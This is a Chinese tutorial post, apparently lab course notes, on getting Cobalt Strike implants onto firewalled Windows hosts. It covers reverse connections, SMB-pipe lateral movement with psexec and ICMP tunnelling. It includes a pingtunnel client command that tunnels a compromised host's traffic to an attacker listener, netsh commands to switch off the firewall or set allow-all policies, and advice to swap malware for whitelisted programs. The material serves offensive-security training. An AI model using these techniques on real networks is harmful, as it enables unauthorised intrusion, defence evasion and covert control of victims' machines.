内网安全-隧道技术&SMB&ICMP&正反向连接&防火墙出入规则上线
目录
内网安全-隧道技术&SMB&ICMP&正反向连接&防火墙出入规则上线
#知识点:
1、入站规则不出网上线方案
2、出站规则不出网上线方案
3、规则-隧道技术-SMB&ICMP
实验背景:
我们上节课讲该实验的时候是没有防火墙的,这里我们win2008和win2012增加了防火墙,也就是说正向连接失效了。并且win2008只能访问web服务,win2012只能访问打印机。(我又重装了一个新的win2008。。。就不在用win2003了)
这里我们先让win7和win10上线,方法就是上一节讲过的方法,这里使用cs来进行操作,msf上节课也讲过了,cs不需要配路由并且比较方便。
然后我们先把win2008的防火墙关闭,然后我们先用CS生成一个后门放到win2008上面看能不能正常上线。
这里发现是可以正常上线的
然后我们把防火墙打开,弄一个网站服务器,在防火墙那里的入站规则写一个允许http的80通过
这个是80端口的页面
这个是90端口的页面
我们用win10去访问80是能访问的,但是访问90就不能访问了。这是因为我们开了防火墙,去访问win2008只能访问80端口,其余端口都不行了
此时我们在想连接这个后门就不行了,因为这个是正向连接,是win10主动找的win2008,然后由于防火墙的原因,因此连接不上。
这个时候我们就可以想着用反向,因为入站规则有限制,我们用反向连接也不会触发入站规则,然后我们再看这张图来分析
这个时候我们想利用reverse这个模式生成反向连接的后门,把win2008的数据给到192.168.22.130的4444端口,想法是对的,但是你给了win10之后win10不知道该干嘛,它虽然收到数据了,但是它会自己把数据交给你的服务器吗,显然是不会的。
正确方法就是在11.129这个会话这里设置转发上线
设置这个转发上线的目的就是说win2008过来的数据,win10能够进行接受并处理
注意这里监听地址要写22.130,如果写11.129的话是不行的,因为win2008访问不到11.129,他俩都不在一个网段
然后我们在利用刚才设置的监听器生成后门
并且这里我们是用的reverse生成的后门,是反向连接不会触发入站规则
点击后门之后,可以看到成功上线
我们看这个拓扑图也是清晰明了。可以看到win2008是反向连接主动找win10的。
然后把win2008拿下之后,我们继续搞win2012,前面也说了win2012开了文件打印机,这个相对应的就是文件共享服务也就是445端口,对应的是SMB服务,一般情况下这个445不会关的。
我们这里正常肯定还是要尝试反向连接,因为win2012也设置了入站,正向肯定不行了。但是如果用反向的话就是win2012找win2008,可win2008又有入站的限制,那肯定是不行的呀,除非win2008没有防火墙了,(但是这里都已经拿到win2008的权限了,我觉得关掉应该挺容易的把)
这里我们想着利用隧道,首先就是我们之前讲的icmp协议,就是先把win2012发出的tcp协议封装成icmp协议,然后送到win2008,这样还是不行的,因为icmp协议到达win2008之后还是会转成tcp,然后win2008有入站检测直接就gg。这里只有一个协议可行,就是SMB协议,也就是说这里只能用SMB隧道才可以成功让2012上线。
这里我们先把win2012的防火墙全打开,然后在入站规则允许一下文件共享服务,也就是445端口即可。
然后我们来到cs这里先设置个SMB的监听器,这里可以看到他是没有ip和端口的设置的,也就说用这个生成的后门它不会把数据交给谁,因为这里ip和端口都没有,因此我们要配合渗透手段来进行上线。也就是SMB的横向移动加这个木马来上线。那也就是正向去搞他
我们先进行端口扫描,就扫33网段的445端口,因为我们已经知道445端口,实战中可以扫描全端口
然后我们进行端口的扫描
这里我们也是成功的扫到了33.130的445端口,也就是win2012的ip
然后直接横向移动,选择pesxec64
这个账号密码是通过前期的信息收集利用工具得到的,监听器就是刚才的SMB的那个监听器,会话就是win2008的那个会话就是33网段的
这里也是利用SMB隧道和横向移动成功让2012上线
这里也就是说先生成了一个SMB管道,然后横向移动在这个管道里面进行,因此正向就行得通了。而刚才win2008那个不能走80是因为端口已经被占用了,它网站是一直开着的。在linux里面ssh和这个smb类似
不出网-控制上线-CS-ICMP隧道
这里补充一个内容,我们也可以利用上节课的icmp隧道去让win2008上线,因为返回的包是没到win10,win10是没有入站规则检测的,所以是可以的,这里就不演示了,这个比较简单。大致内容就是把win2008的流量放到本地的3333端口,然后需要利用那个pingtunnel工具,并且需要有管理员权限,隧道技术是需要有管理员权限的,伪装成icmp协议发送到win10的3344端口。不明白的可以看前面讲icmp隧道的那节课。
隧道技术上线:
HTTP/S & DNS & SSH & ICMP & SMB & 协议穿透等
除去SMB隧道,其他隧道技术大部分针对的出站策略绕过
ICMP
./pingtunnel -type server
肉鸡:(管理器运行)
pingtunnel.exe -type client -l 127.0.0.1:3333 -s 192.168.22.130 -t 192.168.22.130:3344 -tcp 1 -noprint 1 -nolog 1
CS:
监听器1:127.0.0.1 3333
监听器2:192.168.22.130 3344
生成监听器1的Stager后门肉鸡执行
不出网-控制上线-CS-反向连接
不出网-控制上线-CS-SMB隧道
不出网-控制上线-CS-关闭防火墙
这两个我们上面已经说过了
入站过滤上线:
1、隧道技术正向硬刚
2、反向连接跳过
3、关闭&删除&替换
适用利用入站通行拿到的高权限
正向隧道硬刚说过了,反向连接也说了。那你可能会问实战中怎么知道防火墙有正向还是反向,我们可以先试试正向木马,不行就试试反向木马,反向行那可能就是入站有策略。正反向都不行,那可能正反向都有策略。至于怎么知道它可以通过dns,可以通过80端口,可以通过打印机之类的,这个是可以探针的,下节课会讲。
第三种方法就是关闭删除和替换就是指关闭防火墙,删除规则,替换白名单
关闭防火墙和删除规则很好理解,替换白名单就是说有的程序是在防火墙的白名单里面,我们可以把木马文件和那个程序替换,执行木马的时候就会让防火墙给通过。
但他是需要条件的,也就是权限,如果是在内网域里面的话,不仅要有这台主机的权限还要有域控的权限,因为如果在域内的话,我们删除规则的时候是需要有域控的账号密码的,所以他就适用于单纯的内网环境 单纯的内网域环境(域控没有设置组策略防火墙同步)
出站过滤上线:
1、隧道技术反向硬刚
2、正向连接跳过
3、关闭&删除&替换
适用利用入站通行拿到的高权限
采用第三种方案:防火墙开关,删除规则,替换程序
适用于:
1、单纯的内网环境
2、单纯的内网域环境(域控没有设置组策略防火墙同步)
上面我们说了第三种方法是跟防火墙有关的,下面的防火墙命令可以参考一下
但是第三种方案是只针对于自带的防火墙,如果下载的有其他的防火墙就是另说了。
Windows防火墙命令:
https://www.cnblogs.com/tomtellyou/p/16300557.html
查看当前防火墙状态:netsh advfirewall show allprofiles
关闭防火墙:netsh advfirewall set allprofiles state off
开启防火墙:netsh advfirewall set allprofiles state on
恢复初始防火墙设置:netsh advfirewall reset
启用桌面防火墙: netsh advfirewall set allprofiles state on
设置默认输入和输出策略:netsh advfirewall set allprofiles firewallpolicy allowinbound,allowoutbound
如果设置为拒绝使用blockinbound,blockoutbound
290
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
